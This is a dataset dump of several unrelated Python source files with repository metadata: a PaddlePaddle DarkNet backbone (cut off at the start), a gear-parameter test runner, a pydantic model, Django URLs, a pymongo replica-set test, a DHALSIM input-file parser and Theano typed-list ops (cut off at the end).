groups of conv layer, default 1 padding (int): padding size, default 0 norm_type (str): batch norm type, default bn norm_decay (str): decay for weight and bias of batch norm layer, default 0. act (str): activation function type, default 'leaky', which means leaky_relu freeze_norm (bool): whether to freeze norm, default False data_format (str): data format, NCHW or NHWC """ super(ConvBNLayer, self).__init__() self.conv = nn.Conv2D( in_channels=ch_in, out_channels=ch_out, kernel_size=filter_size, stride=stride, padding=padding, groups=groups, data_format=data_format, bias_attr=False) self.batch_norm = batch_norm( ch_out, norm_type=norm_type, norm_decay=norm_decay, freeze_norm=freeze_norm, data_format=data_format) self.act = act def forward(self, inputs): out = self.conv(inputs) out = self.batch_norm(out) if self.act == 'leaky': out = F.leaky_relu(out, 0.1) elif self.act == 'mish': out = mish(out) return out class DownSample(nn.Layer): def __init__(self, ch_in, ch_out, filter_size=3, stride=2, padding=1, norm_type='bn', norm_decay=0., freeze_norm=False, data_format='NCHW'): """ downsample layer Args: ch_in (int): input channel ch_out (int): output channel filter_size (int): filter size, default 3 stride (int): stride, default 2 padding (int): padding size, default 1 norm_type (str): batch norm type, default bn norm_decay (str): decay for weight and bias of batch norm layer, default 0. freeze_norm (bool): whether to freeze norm, default False data_format (str): data format, NCHW or NHWC """ super(DownSample, self).__init__() self.conv_bn_layer = ConvBNLayer( ch_in=ch_in, ch_out=ch_out, filter_size=filter_size, stride=stride, padding=padding, norm_type=norm_type, norm_decay=norm_decay, freeze_norm=freeze_norm, data_format=data_format) self.ch_out = ch_out def forward(self, inputs): out = self.conv_bn_layer(inputs) return out class BasicBlock(nn.Layer): def __init__(self, ch_in, ch_out, norm_type='bn', norm_decay=0., freeze_norm=False, data_format='NCHW'): """ BasicBlock layer of DarkNet Args: ch_in (int): input channel ch_out (int): output channel norm_type (str): batch norm type, default bn norm_decay (str): decay for weight and bias of batch norm layer, default 0. freeze_norm (bool): whether to freeze norm, default False data_format (str): data format, NCHW or NHWC """ super(BasicBlock, self).__init__() self.conv1 = ConvBNLayer( ch_in=ch_in, ch_out=ch_out, filter_size=1, stride=1, padding=0, norm_type=norm_type, norm_decay=norm_decay, freeze_norm=freeze_norm, data_format=data_format) self.conv2 = ConvBNLayer( ch_in=ch_out, ch_out=ch_out * 2, filter_size=3, stride=1, padding=1, norm_type=norm_type, norm_decay=norm_decay, freeze_norm=freeze_norm, data_format=data_format) def forward(self, inputs): conv1 = self.conv1(inputs) conv2 = self.conv2(conv1) out = paddle.add(x=inputs, y=conv2) return out class Blocks(nn.Layer): def __init__(self, ch_in, ch_out, count, norm_type='bn', norm_decay=0., freeze_norm=False, name=None, data_format='NCHW'): """ Blocks layer, which consist of some BaickBlock layers Args: ch_in (int): input channel ch_out (int): output channel count (int): number of BasicBlock layer norm_type (str): batch norm type, default bn norm_decay (str): decay for weight and bias of batch norm layer, default 0. freeze_norm (bool): whether to freeze norm, default False name (str): layer name data_format (str): data format, NCHW or NHWC """ super(Blocks, self).__init__() self.basicblock0 = BasicBlock( ch_in, ch_out, norm_type=norm_type, norm_decay=norm_decay, freeze_norm=freeze_norm, data_format=data_format) self.res_out_list = [] for i in range(1, count): block_name = '{}.{}'.format(name, i) res_out = self.add_sublayer( block_name, BasicBlock( ch_out * 2, ch_out, norm_type=norm_type, norm_decay=norm_decay, freeze_norm=freeze_norm, data_format=data_format)) self.res_out_list.append(res_out) self.ch_out = ch_out def forward(self, inputs): y = self.basicblock0(inputs) for basic_block_i in self.res_out_list: y = basic_block_i(y) return y DarkNet_cfg = {53: ([1, 2, 8, 8, 4])} @register @serializable class DarkNet(nn.Layer): __shared__ = ['norm_type', 'data_format'] def __init__(self, depth=53, freeze_at=-1, return_idx=[2, 3, 4], num_stages=5, norm_type='bn', norm_decay=0., freeze_norm=False, data_format='NCHW'): """ Darknet, see https://pjreddie.com/darknet/yolo/ Args: depth (int): depth of network freeze_at (int): freeze the backbone at which stage filter_size (int): filter size, default 3 return_idx (list): index of stages whose feature maps are returned norm_type (str): batch norm type, default bn norm_decay (str): decay for weight and bias of batch norm layer, default 0. data_format (str): data format, NCHW or NHWC """ super(DarkNet, self).__init__() self.depth = depth self.freeze_at = freeze_at self.return_idx = return_idx self.num_stages = num_stages self.stages = DarkNet_cfg[self.depth][0:num_stages] self.conv0 = ConvBNLayer( ch_in=3, ch_out=32, filter_size=3, stride=1, padding=1, norm_type=norm_type, norm_decay=norm_decay, freeze_norm=freeze_norm, data_format=data_format) self.downsample0 = DownSample( ch_in=32, ch_out=32 * 2, norm_type=norm_type, norm_decay=norm_decay, freeze_norm=freeze_norm, data_format=data_format) self._out_channels = [] self.darknet_conv_block_list = [] self.downsample_list = [] ch_in = [64, 128, 256, 512, 1024] for i, stage in enumerate(self.stages): name = 'stage.{}'.format(i) conv_block = self.add_sublayer( name, Blocks( int(ch_in[i]), 32 * (2**i), stage, norm_type=norm_type, norm_decay=norm_decay, freeze_norm=freeze_norm, data_format=data_format, name=name)) self.darknet_conv_block_list.append(conv_block) if i in return_idx: self._out_channels.append(64 * (2**i)) for i in range(num_stages - 1): down_name = 'stage.{}.downsample'.format(i) downsample = self.add_sublayer( down_name, DownSample( ch_in=32 * (2**(i + 1)), ch_out=32 * (2**(i + 2)), norm_type=norm_type, norm_decay=norm_decay, freeze_norm=freeze_norm, data_format=data_format)) self.downsample_list.append(downsample) def forward(self, inputs): x = inputs['image'] out = self.conv0(x) out = self.downsample0(out) blocks = [] for i, conv_block_i in enumerate(self.darknet_conv_block_list): out = conv_block_i(out) if i == self.freeze_at: out.stop_gradient = True if i in self.return_idx: blocks.append(out) if i < self.num_stages - 1: out = self.downsample_list[i](out) return blocks @property def out_shape(self): return [ShapeSpec(channels=c) for c in self._out_channels]
32.565982
88
0.533093
c060c08d639cb61ab85b481e8967a95e1313a62c
2,945
py
Python
modular_test.py
ndebuhr/gear-params
ca683bc98d6ecde557f1f60f20f8fe18693707b6
[ "MIT" ]
null
null
null
modular_test.py
ndebuhr/gear-params
ca683bc98d6ecde557f1f60f20f8fe18693707b6
[ "MIT" ]
null
null
null
modular_test.py
ndebuhr/gear-params
ca683bc98d6ecde557f1f60f20f8fe18693707b6
[ "MIT" ]
null
null
null
import subprocess import sys class module_test: def __init__(self, module_char, input_file, output_file, expected_file): self.m = module_char self.i = input_file self.o = output_file self.e = expected_file subprocess.call('make',shell=True) spur_test = module_test('S', 'test_files/spur_input.txt', 'spur_output.txt', 'test_files/spur_expected.txt') rack_test = module_test('R', 'test_files/rack_input.txt', 'rack_output.txt', 'test_files/rack_expected.txt') metric_test = module_test('U', 'test_files/metric_input.txt', 'metric_output.txt', 'test_files/metric_expected.txt') spur_wrong_format = module_test('S', 'test_files/spur_wrong_format.txt', 'spur_output.txt', 'test_files/wrong_expected.txt') spur_wrong_vals = module_test('S', 'test_files/spur_wrong_vals.txt', 'spur_output.txt', 'test_files/wrong_expected.txt') rack_wrong_format = module_test('R', 'test_files/rack_wrong_format.txt', 'rack_output.txt', 'test_files/wrong_expected.txt') rack_wrong_vals = module_test('R', 'test_files/rack_wrong_vals.txt', 'rack_output.txt', 'test_files/wrong_expected.txt') metric_wrong_format = module_test('U', 'test_files/metric_wrong_format.txt', 'metric_output.txt', 'test_files/wrong_expected.txt') metric_wrong_vals = module_test('U', 'test_files/metric_wrong_vals.txt', 'metric_output.txt', 'test_files/wrong_expected.txt') tests=[spur_test,rack_test,metric_test] # correct functioning tests += [spur_wrong_format, spur_wrong_vals, rack_wrong_format, rack_wrong_vals, metric_wrong_format, metric_wrong_vals] # stress test for i in range(0,len(tests)): bash_test=' '.join(['bash -x system_test.sh', tests[i].m, tests[i].i, tests[i].o, tests[i].e, '> test_'+str(i)+'.txt']) subprocess.call(bash_test,shell=True) if 'Test failed' in open('test_'+str(i)+'.txt').read(): sys.exit() print('rm test_'+str(i)+'.txt') subprocess.call('rm test_'+str(i)+'.txt',shell=True) subprocess.call('make clean',shell=True)
36.8125
76
0.49983
16a420497cbc2838885d99cdb809ed834438bdec
261
py
Python
server-admin/model/user.py
yafraorg/yapki
66ab6f2db2efa7e0c5dbb85fa7c05e6446518129
[ "Apache-2.0" ]
3
2015-06-24T10:59:28.000Z
2017-09-10T16:49:09.000Z
server-admin/model/user.py
yafraorg/yapki
66ab6f2db2efa7e0c5dbb85fa7c05e6446518129
[ "Apache-2.0" ]
2
2020-04-20T21:06:33.000Z
2020-05-06T10:15:31.000Z
server-admin/model/user.py
yafraorg/yapki
66ab6f2db2efa7e0c5dbb85fa7c05e6446518129
[ "Apache-2.0" ]
1
2016-12-02T10:12:42.000Z
2016-12-02T10:12:42.000Z
from typing import List from pydantic import BaseModel class UserBase(BaseModel): email: str name: str class UserCreate(UserBase): password: str class User(UserBase): id: int is_active: bool class Config: orm_mode = True
12.428571
30
0.67433
8ea7b92be0bbf63a79053f5f71804d03461f2518
253
py
Python
tests/stack_frame_analyzer/utils/parent.py
cesarmerjan/stack_frame_analyzer
4e9f1899016423ca7c3b919221ff9b4778f0e82c
[ "MIT" ]
null
null
null
tests/stack_frame_analyzer/utils/parent.py
cesarmerjan/stack_frame_analyzer
4e9f1899016423ca7c3b919221ff9b4778f0e82c
[ "MIT" ]
null
null
null
tests/stack_frame_analyzer/utils/parent.py
cesarmerjan/stack_frame_analyzer
4e9f1899016423ca7c3b919221ff9b4778f0e82c
[ "MIT" ]
null
null
null
from .main import stack_frame_analyzer class Parent: @property def context(self): return stack_frame_analyzer.get_caller_context(1) @classmethod def _get_context(cls): return stack_frame_analyzer.get_caller_context(1)
21.083333
57
0.735178
77c1866a018a430988f7df5152dcc6fe41e4f03c
737
py
Python
webapp/urls.py
westerjn/cfready-django
2e0f87c9359d67a8535f81b5d74ac5d43ec1b035
[ "MIT" ]
null
null
null
webapp/urls.py
westerjn/cfready-django
2e0f87c9359d67a8535f81b5d74ac5d43ec1b035
[ "MIT" ]
null
null
null
webapp/urls.py
westerjn/cfready-django
2e0f87c9359d67a8535f81b5d74ac5d43ec1b035
[ "MIT" ]
null
null
null
from django.urls import path from . import views urlpatterns = [ path('', views.index, name='home'), path('polls/', views.index, name='index'), # ex: /polls/5/ path('<int:question_id>/', views.detail, name='detail'), # ex: /polls/5/results/ path('<int:question_id>/results/', views.results, name='results'), # ex: /polls/5/vote/ path('<int:question_id>/vote/', views.vote, name='vote'), path('delta/', views.delta, name='default'), path('home/', views.home, name='default'), path('compute/', views.compute, name='default'), path('storage/', views.storage, name='default'), path('data/', views.data, name='default'), path('info/', views.info, name='default'), ]
36.85
71
0.601085
2f02503f54270021b825b963770248475b992bf6
2,025
py
Python
test/mockupdb/test_rsghost.py
infinite-skx/mongo-python-driver
bdafc357331813222b1e677b66041dad1fc852a5
[ "Apache-2.0" ]
null
null
null
test/mockupdb/test_rsghost.py
infinite-skx/mongo-python-driver
bdafc357331813222b1e677b66041dad1fc852a5
[ "Apache-2.0" ]
1
2021-12-24T11:32:17.000Z
2021-12-24T11:32:17.000Z
test/mockupdb/test_rsghost.py
Surfndez/mongo-python-driver
51691246e9b2ef8446f3716c9ba7bab1a9f4e1ad
[ "Apache-2.0" ]
null
null
null
# Copyright 2021-present MongoDB, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Test connections to RSGhost nodes.""" import datetime from mockupdb import going, MockupDB from pymongo import MongoClient from pymongo.errors import ServerSelectionTimeoutError import unittest class TestRSGhost(unittest.TestCase): def test_rsghost(self): rsother_response = { 'ok': 1.0, 'ismaster': False, 'secondary': False, 'info': 'Does not have a valid replica set config', 'isreplicaset': True, 'maxBsonObjectSize': 16777216, 'maxMessageSizeBytes': 48000000, 'maxWriteBatchSize': 100000, 'localTime': datetime.datetime(2021, 11, 30, 0, 53, 4, 99000), 'logicalSessionTimeoutMinutes': 30, 'connectionId': 3, 'minWireVersion': 0, 'maxWireVersion': 15, 'readOnly': False} server = MockupDB(auto_ismaster=rsother_response) server.run() self.addCleanup(server.stop) # Default auto discovery yields a server selection timeout. with MongoClient(server.uri, serverSelectionTimeoutMS=250) as client: with self.assertRaises(ServerSelectionTimeoutError): client.test.command('ping') # Direct connection succeeds. with MongoClient(server.uri, directConnection=True) as client: with going(client.test.command, 'ping'): request = server.receives(ping=1) request.reply() if __name__ == '__main__': unittest.main()
38.207547
77
0.687901
f6e37d74fe9d7940c17297dc80908a58c165981c
8,605
py
Python
dhalsim/parser/input_parser.py
Daveonwave/DHALSIM
c8739e45b87b1b1a9879e2694c94e3d6a0218b59
[ "MIT" ]
null
null
null
dhalsim/parser/input_parser.py
Daveonwave/DHALSIM
c8739e45b87b1b1a9879e2694c94e3d6a0218b59
[ "MIT" ]
null
null
null
dhalsim/parser/input_parser.py
Daveonwave/DHALSIM
c8739e45b87b1b1a9879e2694c94e3d6a0218b59
[ "MIT" ]
2
2021-06-22T20:16:08.000Z
2021-06-22T20:21:03.000Z
import sys import pandas as pd import wntr from antlr4 import * from dhalsim.parser.antlr.controlsLexer import controlsLexer from dhalsim.parser.antlr.controlsParser import controlsParser class Error(Exception): """Base class for exceptions in this module.""" class NoInpFileGiven(Error): """Raised when tag you are looking for does not exist""" class NotEnoughInitialValues(Error): """Raised when there are not enough initial values in a csv""" def value_to_status(actuator_value): """ Translates int corresponding to actuator status. :param actuator_value: The value from the status.value of the actuator :type actuator_value: int """ if actuator_value == 0: return "closed" else: return "open" class InputParser: """ Class handling the parsing of .inp input files. :param intermediate_yaml: The intermediate yaml file """ def __init__(self, intermediate_yaml): """Constructor method""" self.data = intermediate_yaml for plc in self.data['plcs']: if 'sensors' not in plc: plc['sensors'] = list() if 'actuators' not in plc: plc['actuators'] = list() # Get the INP file path if 'inp_file' in self.data.keys(): self.inp_file_path = self.data['inp_file'] else: raise NoInpFileGiven() # Read the inp file with WNTR self.wn = wntr.network.WaterNetworkModel(self.inp_file_path) self.batch_mode = 'batch_simulations' in self.data def write(self): """ Writes all needed inp file sections into the intermediate_yaml. """ # Generate PLC controls self.generate_controls() # Generate list of actuators + initial values self.generate_actuators_list() # Generate list of times self.generate_times() # Generate initial values if batch mode is true if 'initial_tank_data' in self.data: self.generate_initial_tank_values() # Generate network loss values if network loss is true if 'network_loss_data' in self.data: self.generate_network_losses() # Generate network delay values if network delay is true if 'network_delay_data' in self.data: self.generate_network_delays() # Add iterations if not existing if "iterations" not in self.data.keys(): iterations = int(self.data["time"][0]["duration"] / self.data["time"][1]["hydraulic_timestep"]) if iterations <= 0: print(f"Error in inp file section [TIMES]: (duration: {self.data['time'][0]['duration']} / " f"hydraultic timestep: {self.data['time'][1]['hydraulic_timestep']}) = {iterations}") sys.exit(1) self.data["iterations"] = iterations # Return the YAML object return self.data def generate_controls(self): """ Generates list of controls with their types, values, actuators, and potentially dependant; then adds that to self.data to be written to the yaml. """ input_file = FileStream(self.inp_file_path) tree = controlsParser(CommonTokenStream(controlsLexer(input_file))).controls() controls = [] for i in range(0, tree.getChildCount()): child = tree.getChild(i) # Get all common control values from the control actuator = str(child.getChild(1)) action = str(child.getChild(2)) if child.getChildCount() == 8: # This is an AT NODE control dependant = str(child.getChild(5)) value = float(str(child.getChild(7))) controls.append({ "type": str(child.getChild(6)).lower(), "dependant": dependant, "value": value, "actuator": actuator, "action": action.lower() }) if child.getChildCount() == 6: # This is a TIME control value = float(str(child.getChild(5))) controls.append({ "type": "time", "value": int(value), "actuator": actuator, "action": action.lower() }) for plc in self.data['plcs']: plc['controls'] = [] actuators = plc['actuators'] for control in controls: if control['actuator'] in actuators: plc['controls'].append(control) def generate_times(self): """ Generates duration and hydraulic timestep and adds to the data to be written to the yaml file. """ # TODO Decide on the timestep (minutes or seconds?) times = [ {"duration": self.wn.options.time.duration}, {"hydraulic_timestep": self.wn.options.time.hydraulic_timestep} ] self.data['time'] = times def generate_actuators_list(self): """ Generates list of actuators with their initial states and adds to the data to be written to the yaml file. """ pumps = [] for pump in self.wn.pumps(): pumps.append({ "name": pump[0], "initial_state": value_to_status(pump[1].status.value) }) valves = [] for valve in self.wn.valves(): valves.append({ "name": valve[0], "initial_state": value_to_status(valve[1].status.value) }) # Append valves to pumps pumps.extend(valves) self.data['actuators'] = pumps def generate_initial_tank_values(self): """Generates all tanks with their initial values if running in batch mode""" initial_values = {} initial_tank_levels = pd.read_csv(self.data['initial_tank_data']) self.verify_csv_input(initial_tank_levels, 'initial_tank_data') # For all columns in csv for index in range(len(initial_tank_levels.columns)): name = initial_tank_levels.columns[index] # Insert tank value into data data_index = self.data["batch_index"] if self.batch_mode else 0 initial_values[str(name)] = \ float(initial_tank_levels.iloc[data_index, index]) self.data['initial_tank_values'] = initial_values def generate_network_losses(self): """Generates list of routers with their network losses from the input csv""" network_loss = {} network_loss_data = pd.read_csv(self.data['network_loss_data']) self.verify_csv_input(network_loss_data, 'network_loss_data') # For all columns in csv for index in range(len(network_loss_data.columns)): name = network_loss_data.columns[index] # Insert loss value into data data_index = self.data["batch_index"] if self.batch_mode else 0 network_loss[str(name)] = \ float(network_loss_data.iloc[data_index, index]) self.data['network_loss_values'] = network_loss def generate_network_delays(self): """Generates list of routers with their network delays from the input csv""" network_delay = {} network_delay_data = pd.read_csv(self.data['network_delay_data']) self.verify_csv_input(network_delay_data, 'network_delay_data') # For all columns in csv for index in range(len(network_delay_data.columns)): name = network_delay_data.columns[index] # Insert tank : value into data data_index = self.data["batch_index"] if self.batch_mode else 0 network_delay[str(name)] = \ str(network_delay_data.iloc[data_index, index]) + "ms" self.data['network_delay_values'] = network_delay def verify_csv_input(self, dataframe, data): """ Verifies the csv files have the proper number of rows for a simulation :param dataframe: pandas dataframe containing csv data :param data: name of data that is being verified """ num_rows = len(dataframe) if self.batch_mode: if num_rows < self.data['batch_simulations']: raise NotEnoughInitialValues("Provided csv has fewer rows than number of batch simulations: " + data) else: if num_rows <= 0: raise NotEnoughInitialValues("Provided csv has no data: " + data)
36.773504
117
0.59756
826c1e2053a7354e3b2519acb79022433b1a13ca
18,311
py
Python
theano/typed_list/basic.py
bridgeland/Theano-PyMC
ddfbde2d03061dead7190a99b78c7cef7896bd04
[ "BSD-3-Clause" ]
null
null
null
theano/typed_list/basic.py
bridgeland/Theano-PyMC
ddfbde2d03061dead7190a99b78c7cef7896bd04
[ "BSD-3-Clause" ]
null
null
null
theano/typed_list/basic.py
bridgeland/Theano-PyMC
ddfbde2d03061dead7190a99b78c7cef7896bd04
[ "BSD-3-Clause" ]
null
null
null
import numpy as np from .type import TypedListType import theano from theano.gof import Apply, Constant, Op, Variable from theano.tensor.type_other import SliceType from theano import tensor as T from theano.compile.debugmode import _lessbroken_deepcopy class _typed_list_py_operators: def __getitem__(self, index): return getitem(self, index) def __len__(self): return length(self) def append(self, toAppend): return append(self, toAppend) def extend(self, toAppend): return extend(self, toAppend) def insert(self, index, toInsert): return insert(self, index, toInsert) def remove(self, toRemove): return remove(self, toRemove) def reverse(self): return reverse(self) def count(self, elem): return count(self, elem) # name "index" is already used by an attribute def ind(self, elem): return index_(self, elem) ttype = property(lambda self: self.type.ttype) dtype = property(lambda self: self.type.ttype.dtype) ndim = property(lambda self: self.type.ttype.ndim + 1) class TypedListVariable(_typed_list_py_operators, Variable): """ Subclass to add the typed list operators to the basic `Variable` class. """ TypedListType.Variable = TypedListVariable class TypedListConstant(_typed_list_py_operators, Constant): """ Subclass to add the typed list operators to the basic `Variable` class. """ TypedListType.Constant = TypedListConstant class GetItem(Op): # See doc in instance of this Op or function after this class definition. view_map = {0: [0]} __props__ = () def make_node(self, x, index): assert isinstance(x.type, TypedListType) if not isinstance(index, Variable): if isinstance(index, slice): index = Constant(SliceType(), index) return Apply(self, [x, index], [x.type()]) else: index = T.constant(index, ndim=0, dtype="int64") return Apply(self, [x, index], [x.ttype()]) if isinstance(index.type, SliceType): return Apply(self, [x, index], [x.type()]) elif isinstance(index, T.TensorVariable) and index.ndim == 0: assert index.dtype == "int64" return Apply(self, [x, index], [x.ttype()]) else: raise TypeError("Expected scalar or slice as index.") def perform(self, node, inputs, outputs): (x, index) = inputs (out,) = outputs if not isinstance(index, slice): index = int(index) out[0] = x[index] def __str__(self): return self.__class__.__name__ def c_code(self, node, name, inp, out, sub): x_name, index = inp[0], inp[1] output_name = out[0] fail = sub["fail"] return ( """ %(output_name)s = (typeof %(output_name)s) PyList_GetItem( (PyObject*) %(x_name)s, *((npy_int64 *) PyArray_DATA(%(index)s))); if(%(output_name)s == NULL){ %(fail)s } Py_INCREF(%(output_name)s); """ % locals() ) def c_code_cache_version(self): return (1,) getitem = GetItem() """ Get specified slice of a typed list. Parameters ---------- x Typed list. index The index of the value to return from `x`. """ class Append(Op): # See doc in instance of this Op after the class definition. __props__ = ("inplace",) def __init__(self, inplace=False): self.inplace = inplace if self.inplace: self.destroy_map = {0: [0]} # TODO: make destroy_handler support having views and # destroyed version of multiple inputs. # self.view_map = {0: [1]} else: # TODO: make destroy_handler support multiple view # self.view_map = {0: [0, 1]} self.view_map = {0: [0]} def make_node(self, x, toAppend): assert isinstance(x.type, TypedListType) assert x.ttype == toAppend.type, (x.ttype, toAppend.type) return Apply(self, [x, toAppend], [x.type()]) def perform(self, node, inputs, outputs): (x, toAppend) = inputs (out,) = outputs if not self.inplace: out[0] = list(x) else: out[0] = x # need to copy toAppend due to destroy_handler limitation toAppend = _lessbroken_deepcopy(toAppend) out[0].append(toAppend) def __str__(self): return self.__class__.__name__ # DISABLED AS WE NEED TO UPDATE IT TO COPY toAppend(). def _c_code_(self, node, name, inp, out, sub): x_name, toAppend = inp[0], inp[1] output_name = out[0] fail = sub["fail"] if not self.inplace: init = ( """ %(output_name)s = (PyListObject*) PyList_GetSlice((PyObject*) %(x_name)s, 0, PyList_GET_SIZE((PyObject*) %(x_name)s)) ; """ % locals() ) else: init = ( """ %(output_name)s = %(x_name)s; """ % locals() ) return ( init + """ if(%(output_name)s==NULL){ %(fail)s }; if(PyList_Append( (PyObject*) %(output_name)s,(PyObject*) %(toAppend)s)){ %(fail)s }; Py_INCREF(%(output_name)s); """ % locals() ) def c_code_cache_version(self): return (1,) append = Append() """ Append an element at the end of another list. Parameters ---------- x The base typed list. y The element to append to `x`. """ class Extend(Op): # See doc in instance of this Op after the class definition. __props__ = ("inplace",) def __init__(self, inplace=False): self.inplace = inplace if self.inplace: self.destroy_map = {0: [0]} # TODO: make destroy_handler support having views and # destroyed version of multiple inputs. # self.view_map = {0: [1]} else: # TODO: make destroy_handler support multiple view # self.view_map = {0: [0, 1]} self.view_map = {0: [0]} def make_node(self, x, toAppend): assert isinstance(x.type, TypedListType) assert x.type == toAppend.type return Apply(self, [x, toAppend], [x.type()]) def perform(self, node, inputs, outputs): (x, toAppend) = inputs (out,) = outputs if not self.inplace: out[0] = list(x) else: out[0] = x # need to copy toAppend due to destroy_handler limitation if toAppend: o = out[0] for i in toAppend: o.append(_lessbroken_deepcopy(i)) def __str__(self): return self.__class__.__name__ # DISABLED AS WE NEED TO UPDATE IT TO COPY toAppend(). def _c_code_(self, node, name, inp, out, sub): x_name, toAppend = inp[0], inp[1] output_name = out[0] fail = sub["fail"] if not self.inplace: init = ( """ %(output_name)s = (PyListObject*) PyList_GetSlice((PyObject*) %(x_name)s, 0, PyList_GET_SIZE((PyObject*) %(x_name)s)) ; """ % locals() ) else: init = ( """ %(output_name)s = %(x_name)s; """ % locals() ) return ( init + """ int i =0; int length = PyList_GET_SIZE((PyObject*) %(toAppend)s); if(%(output_name)s==NULL){ %(fail)s }; for(i; i < length; i++){ if(PyList_Append( (PyObject*) %(output_name)s,(PyObject*) PyList_GetItem((PyObject*) %(toAppend)s,i))==-1){ %(fail)s }; } Py_INCREF(%(output_name)s); """ % locals() ) def c_code_cache_version_(self): return (1,) extend = Extend() """ Append all elements of a list at the end of another list. Parameters ---------- x The typed list to extend. toAppend The typed list that will be added at the end of `x`. """ class Insert(Op): # See doc in instance of this Op after the class definition. __props__ = ("inplace",) def __init__(self, inplace=False): self.inplace = inplace if self.inplace: self.destroy_map = {0: [0]} # TODO: make destroy_handler support having views and # destroyed version of multiple inputs. # self.view_map = {0: [2]} else: # TODO: make destroy_handler support multiple view # self.view_map = {0: [0, 2]} self.view_map = {0: [0]} def make_node(self, x, index, toInsert): assert isinstance(x.type, TypedListType) assert x.ttype == toInsert.type if not isinstance(index, Variable): index = T.constant(index, ndim=0, dtype="int64") else: assert index.dtype == "int64" assert isinstance(index, T.TensorVariable) and index.ndim == 0 return Apply(self, [x, index, toInsert], [x.type()]) def perform(self, node, inputs, outputs): (x, index, toInsert) = inputs (out,) = outputs if not self.inplace: out[0] = list(x) else: out[0] = x # need to copy toAppend due to destroy_handler limitation toInsert = _lessbroken_deepcopy(toInsert) out[0].insert(index, toInsert) def __str__(self): return self.__class__.__name__ # DISABLED AS WE NEED TO UPDATE IT TO COPY toAppend(). def _c_code_(self, node, name, inp, out, sub): x_name, index, toInsert = inp[0], inp[1], inp[2] output_name = out[0] fail = sub["fail"] if not self.inplace: init = ( """ %(output_name)s = (PyListObject*) PyList_GetSlice((PyObject*) %(x_name)s, 0, PyList_GET_SIZE((PyObject*) %(x_name)s)) ; """ % locals() ) else: init = ( """ %(output_name)s = %(x_name)s; """ % locals() ) return ( init + """ if(%(output_name)s==NULL){ %(fail)s }; if(PyList_Insert((PyObject*) %(output_name)s, *((npy_int64 *) PyArray_DATA(%(index)s)), (PyObject*) %(toInsert)s)==-1){ %(fail)s }; Py_INCREF(%(output_name)s); """ % locals() ) def c_code_cache_version(self): return (1,) insert = Insert() """ Insert an element at an index in a typed list. Parameters ---------- x The typed list to modify. index The index where to put the new element in `x`. toInsert The new element to insert. """ class Remove(Op): # See doc in instance of this Op after the class definition. __props__ = ("inplace",) def __init__(self, inplace=False): self.inplace = inplace if self.inplace: self.destroy_map = {0: [0]} else: self.view_map = {0: [0]} def make_node(self, x, toRemove): assert isinstance(x.type, TypedListType) assert x.ttype == toRemove.type return Apply(self, [x, toRemove], [x.type()]) def perform(self, node, inputs, outputs): (x, toRemove) = inputs (out,) = outputs if not self.inplace: out[0] = list(x) else: out[0] = x """ Inelegant workaround for ValueError: The truth value of an array with more than one element is ambiguous. Use a.any() or a.all() being thrown when trying to remove a matrix from a matrices list. """ for y in range(out[0].__len__()): if node.inputs[0].ttype.values_eq(out[0][y], toRemove): del out[0][y] break def __str__(self): return self.__class__.__name__ remove = Remove() """Remove an element from a typed list. Parameters ---------- x The typed list to be changed. toRemove An element to be removed from the typed list. We only remove the first instance. Notes ----- Python implementation of remove doesn't work when we want to remove an ndarray from a list. This implementation works in that case. """ class Reverse(Op): # See doc in instance of this Op after the class definition. __props__ = ("inplace",) def __init__(self, inplace=False): self.inplace = inplace if self.inplace: self.destroy_map = {0: [0]} else: self.view_map = {0: [0]} def make_node(self, x): assert isinstance(x.type, TypedListType) return Apply(self, [x], [x.type()]) def perform(self, node, inp, outputs): (out,) = outputs if not self.inplace: out[0] = list(inp[0]) else: out[0] = inp[0] out[0].reverse() def __str__(self): return self.__class__.__name__ def c_code(self, node, name, inp, out, sub): x_name = inp[0] output_name = out[0] fail = sub["fail"] if not self.inplace: init = ( """ %(output_name)s = (PyListObject*) PyList_GetSlice((PyObject*) %(x_name)s, 0, PyList_GET_SIZE((PyObject*) %(x_name)s)) ; """ % locals() ) else: init = ( """ %(output_name)s = %(x_name)s; """ % locals() ) return ( init + """ if(%(output_name)s==NULL){ %(fail)s }; if(PyList_Reverse((PyObject*) %(output_name)s)==-1){ %(fail)s }; Py_INCREF(%(output_name)s); """ % locals() ) def c_code_cache_version(self): return (1,) reverse = Reverse() """ Reverse the order of a typed list. Parameters ---------- x The typed list to be reversed. """ class Index(Op): # See doc in instance of this Op after the class definition. __props__ = () def make_node(self, x, elem): assert isinstance(x.type, TypedListType) assert x.ttype == elem.type return Apply(self, [x, elem], [T.scalar()]) def perform(self, node, inputs, outputs): """ Inelegant workaround for ValueError: The truth value of an array with more than one element is ambiguous. Use a.any() or a.all() being thrown when trying to remove a matrix from a matrices list """ (x, elem) = inputs (out,) = outputs for y in range(len(x)): if node.inputs[0].ttype.values_eq(x[y], elem): out[0] = np.asarray(y, dtype=theano.config.floatX) break def __str__(self): return self.__class__.__name__ index_ = Index() class Count(Op): # See doc in instance of this Op after the class definition. __props__ = () def make_node(self, x, elem): assert isinstance(x.type, TypedListType) assert x.ttype == elem.type return Apply(self, [x, elem], [T.scalar()]) def perform(self, node, inputs, outputs): """ Inelegant workaround for ValueError: The truth value of an array with more than one element is ambiguous. Use a.any() or a.all() being thrown when trying to remove a matrix from a matrices list """ (x, elem) = inputs (out,) = outputs out[0] = 0 for y in range(len(x)): if node.inputs[0].ttype.values_eq(x[y], elem): out[0] += 1 out[0] = np.asarray(out[0], dtype=theano.config.floatX) def __str__(self): return self.__class__.__name__ count = Count() """ Count the number of times an element is in the typed list. Parameters ---------- x The typed list to look into. elem The element we want to count in list. The elements are compared with equals. Notes ----- Python implementation of count doesn't work when we want to count an ndarray from a list. This implementation works in that case. """ class Length(Op): # See doc in instance of this Op after the class definition. __props__ = () def make_node(self, x): assert isinstance(x.type, TypedListType) return Apply(self, [x], [T.scalar(dtype="int64")]) def perform(self, node, x, outputs): (out,) = outputs out[0] = np.asarray(len(x[0]), "int64") def __str__(self): return self.__class__.__name__ def c_code(self, node, name, inp, out, sub): x_name = inp[0] output_name = out[0] fail = sub["fail"] return ( """ if(!%(output_name)s) %(output_name)s=(PyArrayObject*)PyArray_EMPTY(0, NULL, NPY_INT64, 0); 